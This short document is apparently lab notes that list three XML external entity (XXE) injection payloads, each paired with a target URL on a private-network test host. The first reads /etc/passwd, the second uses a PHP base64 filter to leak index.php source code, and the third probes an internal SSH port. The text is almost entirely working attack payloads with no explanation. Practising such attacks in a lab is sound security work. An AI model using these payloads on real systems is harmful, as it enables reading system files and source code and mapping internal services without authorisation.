<?xml
version="1.0"?>
<!DOCTYPE
creds[
<!ELEMENT
username ANY>
<!ELEMENT
password ANY>
<!ENTITY xxe
SYSTEM "file:///etc/passwd">]>
<creds>
<username>&xxe;</username>
<password>test</password>
</creds>
访问http://192.168.4.130/xxe/index.php
<?xml
version="1.0"?>
<!DOCTYPE
creds[
<!ELEMENT
username ANY>
<!ELEMENT
password ANY>
<!ENTITY xxe SYSTEM
"php://filter/read=convert.base64-encode/resource=index.php">]>
<creds>
<username>&xxe;</username>
<password>test</password>
</creds>
访问http://192.168.4.130/xxe/index.php
<?xml
version="1.0"?>
<!DOCTYPE
creds[
<!ELEMENT
username ANY>
<!ELEMENT
password ANY>
<!ENTITY xxe SYSTEM "http://127.0.0.1:22">]>
<creds>
<username>&xxe;</username>
<password>test</password>
</creds>
访问
http://192.168.4.130/xxe/index.php